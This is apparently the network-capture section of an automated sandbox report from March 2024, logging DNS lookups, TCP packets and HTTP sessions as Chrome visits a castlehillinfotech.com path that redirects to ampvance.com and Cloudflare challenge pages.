                                                      Mar 5, 2024 14:25:13.017136097 CET49767443192.168.2.5104.21.81.229
                                                      Mar 5, 2024 14:25:13.042387962 CET49767443192.168.2.5104.21.81.229
                                                      Mar 5, 2024 14:25:13.042399883 CET44349767104.21.81.229192.168.2.5
                                                      Mar 5, 2024 14:25:13.226609945 CET44349767104.21.81.229192.168.2.5
                                                      Mar 5, 2024 14:25:13.266459942 CET49767443192.168.2.5104.21.81.229
                                                      Mar 5, 2024 14:25:13.266473055 CET44349767104.21.81.229192.168.2.5
                                                      Mar 5, 2024 14:25:13.266967058 CET44349767104.21.81.229192.168.2.5
                                                      Mar 5, 2024 14:25:13.267512083 CET49767443192.168.2.5104.21.81.229
                                                      Mar 5, 2024 14:25:13.267573118 CET44349767104.21.81.229192.168.2.5
                                                      Mar 5, 2024 14:25:13.314773083 CET49767443192.168.2.5104.21.81.229
                                                      Mar 5, 2024 14:25:28.219788074 CET44349767104.21.81.229192.168.2.5
                                                      Mar 5, 2024 14:25:28.219861984 CET44349767104.21.81.229192.168.2.5
                                                      Mar 5, 2024 14:25:28.223459005 CET49767443192.168.2.5104.21.81.229
                                                      Mar 5, 2024 14:25:30.166909933 CET49767443192.168.2.5104.21.81.229
                                                      Mar 5, 2024 14:25:30.166937113 CET44349767104.21.81.229192.168.2.5
                                                      Mar 5, 2024 14:25:33.226236105 CET49770443192.168.2.5142.251.41.4
                                                      Mar 5, 2024 14:25:33.226288080 CET44349770142.251.41.4192.168.2.5
                                                      Mar 5, 2024 14:25:33.226358891 CET49770443192.168.2.5142.251.41.4
                                                      Mar 5, 2024 14:25:33.228178024 CET49770443192.168.2.5142.251.41.4
                                                      Mar 5, 2024 14:25:33.228193998 CET44349770142.251.41.4192.168.2.5
                                                      Mar 5, 2024 14:25:33.416081905 CET44349770142.251.41.4192.168.2.5
                                                      Mar 5, 2024 14:25:33.416373968 CET49770443192.168.2.5142.251.41.4
                                                      Mar 5, 2024 14:25:33.416397095 CET44349770142.251.41.4192.168.2.5
                                                      Mar 5, 2024 14:25:33.416963100 CET44349770142.251.41.4192.168.2.5
                                                      Mar 5, 2024 14:25:33.417398930 CET49770443192.168.2.5142.251.41.4
                                                      Mar 5, 2024 14:25:33.417469978 CET44349770142.251.41.4192.168.2.5
                                                      Mar 5, 2024 14:25:33.470698118 CET49770443192.168.2.5142.251.41.4
                                                      Mar 5, 2024 14:25:34.520978928 CET49771443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:34.521042109 CET4434977135.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:34.521312952 CET49771443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:34.521667004 CET49771443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:34.521681070 CET4434977135.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:34.609105110 CET49772443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:34.609153986 CET4434977235.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:34.609213114 CET49772443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:34.609594107 CET49772443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:34.609608889 CET4434977235.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:34.703695059 CET4434977135.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:34.703975916 CET49771443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:34.704010963 CET4434977135.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:34.704562902 CET4434977135.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:34.705019951 CET49771443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:34.705096960 CET4434977135.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:34.705408096 CET49771443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:34.749910116 CET4434977135.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:34.796706915 CET4434977235.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:34.796912909 CET49772443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:34.796927929 CET4434977235.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:34.797939062 CET4434977235.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:34.798000097 CET49772443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:34.798366070 CET49772443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:34.798413038 CET4434977235.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:34.798481941 CET49772443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:34.798494101 CET4434977235.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:34.845712900 CET49772443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:34.910506010 CET4434977135.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:34.910588980 CET4434977135.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:34.910657883 CET49771443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:34.910806894 CET49771443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:34.910854101 CET4434977135.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:34.911576986 CET49773443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:34.911612034 CET4434977335.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:34.911673069 CET49773443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:34.911958933 CET49773443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:34.911971092 CET4434977335.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.004465103 CET4434977235.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.004658937 CET4434977235.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.004719973 CET49772443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:35.004822016 CET49772443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:35.004858971 CET4434977235.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.004874945 CET49772443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:35.004900932 CET49772443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:35.005702019 CET49774443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:35.005736113 CET4434977435.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.005800962 CET49774443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:35.006213903 CET49774443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:35.006227970 CET4434977435.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.095099926 CET4434977335.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.095365047 CET49773443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:35.095379114 CET4434977335.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.095930099 CET4434977335.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.096369028 CET49773443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:35.096438885 CET4434977335.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.096520901 CET49773443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:35.096558094 CET49773443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:35.096582890 CET4434977335.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.195306063 CET4434977435.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.195601940 CET49774443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:35.195630074 CET4434977435.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.195987940 CET4434977435.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.196368933 CET49774443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:35.196438074 CET4434977435.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.196499109 CET49774443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:35.196513891 CET49774443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:35.196527958 CET4434977435.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.305150032 CET4434977335.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.305234909 CET4434977335.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.305286884 CET49773443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:35.305461884 CET49773443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:35.305484056 CET4434977335.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.399542093 CET4434977435.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.399739981 CET4434977435.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.399801016 CET49774443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:35.399954081 CET49774443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:35.399972916 CET4434977435.190.80.1192.168.2.5
                                                      Mar 5, 2024 14:25:35.399995089 CET49774443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:35.400019884 CET49774443192.168.2.535.190.80.1
                                                      Mar 5, 2024 14:25:43.424341917 CET44349770142.251.41.4192.168.2.5
                                                      Mar 5, 2024 14:25:43.424407005 CET44349770142.251.41.4192.168.2.5
                                                      Mar 5, 2024 14:25:43.424458027 CET49770443192.168.2.5142.251.41.4
                                                      Mar 5, 2024 14:25:44.754405022 CET49770443192.168.2.5142.251.41.4
                                                      Mar 5, 2024 14:25:44.754431963 CET44349770142.251.41.4192.168.2.5
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Mar 5, 2024 14:24:28.430007935 CET53550921.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:24:28.464952946 CET53636211.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:24:29.022160053 CET53566981.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:24:29.835396051 CET6544753192.168.2.51.1.1.1
                                                      Mar 5, 2024 14:24:29.836812973 CET5306253192.168.2.51.1.1.1
                                                      Mar 5, 2024 14:24:30.401000977 CET53530621.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:24:30.437720060 CET53654471.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:24:32.816447973 CET6035753192.168.2.51.1.1.1
                                                      Mar 5, 2024 14:24:32.817869902 CET5819753192.168.2.51.1.1.1
                                                      Mar 5, 2024 14:24:32.904314995 CET53603571.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:24:32.906331062 CET53581971.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:24:33.761254072 CET6438953192.168.2.51.1.1.1
                                                      Mar 5, 2024 14:24:33.762057066 CET5178153192.168.2.51.1.1.1
                                                      Mar 5, 2024 14:24:33.939682007 CET53643891.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:24:33.982887030 CET53517811.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:24:34.522447109 CET5260353192.168.2.51.1.1.1
                                                      Mar 5, 2024 14:24:34.527621031 CET5583753192.168.2.51.1.1.1
                                                      Mar 5, 2024 14:24:34.609922886 CET53526031.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:24:34.615761042 CET53558371.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:24:34.997772932 CET5336153192.168.2.51.1.1.1
                                                      Mar 5, 2024 14:24:34.997972965 CET6413053192.168.2.51.1.1.1
                                                      Mar 5, 2024 14:24:35.085927963 CET53641301.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:24:35.086154938 CET53533611.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:24:36.273066998 CET5952753192.168.2.51.1.1.1
                                                      Mar 5, 2024 14:24:36.273915052 CET5121753192.168.2.51.1.1.1
                                                      Mar 5, 2024 14:24:36.281167984 CET5907253192.168.2.51.1.1.1
                                                      Mar 5, 2024 14:24:36.281996965 CET5053753192.168.2.51.1.1.1
                                                      Mar 5, 2024 14:24:36.362106085 CET53595271.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:24:36.362133980 CET53512171.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:24:36.372764111 CET53505371.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:24:36.451634884 CET53590721.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:24:37.308716059 CET5520853192.168.2.51.1.1.1
                                                      Mar 5, 2024 14:24:37.309421062 CET6346053192.168.2.51.1.1.1
                                                      Mar 5, 2024 14:24:37.397147894 CET53552081.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:24:37.397557020 CET53634601.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:24:46.544580936 CET53595621.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:25:03.892577887 CET53651301.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:25:05.541537046 CET53612241.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:25:27.967463970 CET53510371.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:25:28.065531969 CET53576931.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:25:34.519171953 CET5375153192.168.2.51.1.1.1
                                                      Mar 5, 2024 14:25:34.519489050 CET6141953192.168.2.51.1.1.1
                                                      Mar 5, 2024 14:25:34.607738972 CET53537511.1.1.1192.168.2.5
                                                      Mar 5, 2024 14:25:34.608375072 CET53614191.1.1.1192.168.2.5
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Mar 5, 2024 14:24:29.835396051 CET192.168.2.51.1.1.10x6858Standard query (0)rfpcertstream.castlehillinfotech.comA (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:29.836812973 CET192.168.2.51.1.1.10xbf90Standard query (0)rfpcertstream.castlehillinfotech.com65IN (0x0001)false
                                                      Mar 5, 2024 14:24:32.816447973 CET192.168.2.51.1.1.10xbba9Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:32.817869902 CET192.168.2.51.1.1.10xf388Standard query (0)www.google.com65IN (0x0001)false
                                                      Mar 5, 2024 14:24:33.761254072 CET192.168.2.51.1.1.10xb85fStandard query (0)ampvance.comA (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:33.762057066 CET192.168.2.51.1.1.10x75a8Standard query (0)ampvance.com65IN (0x0001)false
                                                      Mar 5, 2024 14:24:34.522447109 CET192.168.2.51.1.1.10x4466Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:34.527621031 CET192.168.2.51.1.1.10x3978Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                      Mar 5, 2024 14:24:34.997772932 CET192.168.2.51.1.1.10xe4cStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:34.997972965 CET192.168.2.51.1.1.10xedaaStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Mar 5, 2024 14:24:36.273066998 CET192.168.2.51.1.1.10x5cb0Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:36.273915052 CET192.168.2.51.1.1.10xf27bStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Mar 5, 2024 14:24:36.281167984 CET192.168.2.51.1.1.10x7a72Standard query (0)ampvance.comA (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:36.281996965 CET192.168.2.51.1.1.10xf242Standard query (0)ampvance.com65IN (0x0001)false
                                                      Mar 5, 2024 14:24:37.308716059 CET192.168.2.51.1.1.10xe9fbStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:37.309421062 CET192.168.2.51.1.1.10xdb1Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Mar 5, 2024 14:25:34.519171953 CET192.168.2.51.1.1.10xe546Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:25:34.519489050 CET192.168.2.51.1.1.10x1b68Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Mar 5, 2024 14:24:30.437720060 CET1.1.1.1192.168.2.50x6858No error (0)rfpcertstream.castlehillinfotech.com172.105.184.142A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:32.904314995 CET1.1.1.1192.168.2.50xbba9No error (0)www.google.com142.251.41.4A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:32.906331062 CET1.1.1.1192.168.2.50xf388No error (0)www.google.com65IN (0x0001)false
                                                      Mar 5, 2024 14:24:33.939682007 CET1.1.1.1192.168.2.50xb85fNo error (0)ampvance.com104.21.81.229A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:33.939682007 CET1.1.1.1192.168.2.50xb85fNo error (0)ampvance.com172.67.165.105A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:33.982887030 CET1.1.1.1192.168.2.50x75a8No error (0)ampvance.com65IN (0x0001)false
                                                      Mar 5, 2024 14:24:34.609922886 CET1.1.1.1192.168.2.50x4466No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:35.085927963 CET1.1.1.1192.168.2.50xedaaNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Mar 5, 2024 14:24:35.086154938 CET1.1.1.1192.168.2.50xe4cNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:35.086154938 CET1.1.1.1192.168.2.50xe4cNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:36.362106085 CET1.1.1.1192.168.2.50x5cb0No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:36.362106085 CET1.1.1.1192.168.2.50x5cb0No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:36.362133980 CET1.1.1.1192.168.2.50xf27bNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Mar 5, 2024 14:24:36.372764111 CET1.1.1.1192.168.2.50xf242No error (0)ampvance.com65IN (0x0001)false
                                                      Mar 5, 2024 14:24:36.451634884 CET1.1.1.1192.168.2.50x7a72No error (0)ampvance.com104.21.81.229A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:36.451634884 CET1.1.1.1192.168.2.50x7a72No error (0)ampvance.com172.67.165.105A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:37.397147894 CET1.1.1.1192.168.2.50xe9fbNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:37.397147894 CET1.1.1.1192.168.2.50xe9fbNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:37.397557020 CET1.1.1.1192.168.2.50xdb1No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Mar 5, 2024 14:24:44.996107101 CET1.1.1.1192.168.2.50x733aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Mar 5, 2024 14:24:44.996107101 CET1.1.1.1192.168.2.50x733aNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:58.327590942 CET1.1.1.1192.168.2.50x1364No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Mar 5, 2024 14:24:58.327590942 CET1.1.1.1192.168.2.50x1364No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:25:20.638674974 CET1.1.1.1192.168.2.50x736No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Mar 5, 2024 14:25:20.638674974 CET1.1.1.1192.168.2.50x736No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:25:34.607738972 CET1.1.1.1192.168.2.50xe546No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:25:41.935059071 CET1.1.1.1192.168.2.50xd147No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Mar 5, 2024 14:25:41.935059071 CET1.1.1.1192.168.2.50xd147No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                      • rfpcertstream.castlehillinfotech.com
                                                      • https:
                                                        • ampvance.com
                                                        • challenges.cloudflare.com
                                                      • fs.microsoft.com
                                                      • a.nel.cloudflare.com
                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                      Mar 5, 2024 14:24:43.028490067 CET23.1.237.91443192.168.2.549703CN=r.bing.com, O=Microsoft Corporation, L=Redmond, ST=WA, C=US CN=Microsoft Azure ECC TLS Issuing CA 05, O=Microsoft Corporation, C=USCN=Microsoft Azure ECC TLS Issuing CA 05, O=Microsoft Corporation, C=US CN=DigiCert Global Root G3, OU=www.digicert.com, O=DigiCert Inc, C=USWed Oct 18 22:32:40 CEST 2023 Wed Aug 12 02:00:00 CEST 2020Fri Jun 28 01:59:59 CEST 2024 Fri Jun 28 01:59:59 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-65281,29-23-24,028a2c9bd18a11de089ef85a160da29e4
                                                      CN=Microsoft Azure ECC TLS Issuing CA 05, O=Microsoft Corporation, C=USCN=DigiCert Global Root G3, OU=www.digicert.com, O=DigiCert Inc, C=USWed Aug 12 02:00:00 CEST 2020Fri Jun 28 01:59:59 CEST 2024
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.549710172.105.184.1424433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:31 UTC696OUTGET /satin/x4/cg1-b1m/ HTTP/1.1
                                                      Host: rfpcertstream.castlehillinfotech.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-User: ?1
                                                      Sec-Fetch-Dest: document
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:31 UTC409INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:24:31 GMT
                                                      Server: Apache
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      refresh: 2;url=https://ampvance.com
                                                      Set-Cookie: PHPSESSID=l6ar9h92mlej1gtsviqvnkqtjg; path=/
                                                      Upgrade: h2
                                                      Connection: Upgrade, close
                                                      Vary: Accept-Encoding
                                                      Transfer-Encoding: chunked
                                                      Content-Type: text/html; charset=UTF-8
                                                      2024-03-05 13:24:31 UTC84INData Raw: 34 39 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 26 26 28 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 73 70 6c 69 74 28 22 23 22 29 5b 30 5d 29 3c 2f 73 63 72 69 70 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 49<script>location.hash&&(location.href=location.href.split("#")[0])</scrip0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.549709172.105.184.1424433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:31 UTC691OUTGET /favicon.ico HTTP/1.1
                                                      Host: rfpcertstream.castlehillinfotech.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: PHPSESSID=l6ar9h92mlej1gtsviqvnkqtjg
                                                      2024-03-05 13:24:32 UTC164INHTTP/1.1 404 Not Found
                                                      Date: Tue, 05 Mar 2024 13:24:31 GMT
                                                      Server: Apache
                                                      Content-Length: 283
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      2024-03-05 13:24:32 UTC283INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 72 66 70 63 65 72 74 73 74 72 65 61 6d 2e 63 61 73 74 6c 65 68 69 6c 6c 69 6e 66 6f 74 65 63 68 2e 63 6f 6d 20 50 6f 72 74 20 34
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at rfpcertstream.castlehillinfotech.com Port 4


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.54971423.51.58.94443
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:33 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Accept: */*
                                                      Accept-Encoding: identity
                                                      User-Agent: Microsoft BITS/7.8
                                                      Host: fs.microsoft.com
                                                      2024-03-05 13:24:34 UTC466INHTTP/1.1 200 OK
                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                      Content-Type: application/octet-stream
                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                      Server: ECAcc (chd/0792)
                                                      X-CID: 11
                                                      X-Ms-ApiVersion: Distribute 1.2
                                                      X-Ms-Region: prod-eus-z1
                                                      Cache-Control: public, max-age=21682
                                                      Date: Tue, 05 Mar 2024 13:24:33 GMT
                                                      Connection: close
                                                      X-CID: 2


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.54971723.51.58.94443
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:34 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Accept: */*
                                                      Accept-Encoding: identity
                                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                      Range: bytes=0-2147483646
                                                      User-Agent: Microsoft BITS/7.8
                                                      Host: fs.microsoft.com
                                                      2024-03-05 13:24:34 UTC455INHTTP/1.1 200 OK
                                                      ApiVersion: Distribute 1.1
                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                      Content-Type: application/octet-stream
                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                      Server: ECAcc (chd/0778)
                                                      X-CID: 11
                                                      Cache-Control: public, max-age=21704
                                                      Date: Tue, 05 Mar 2024 13:24:34 GMT
                                                      Content-Length: 55
                                                      Connection: close
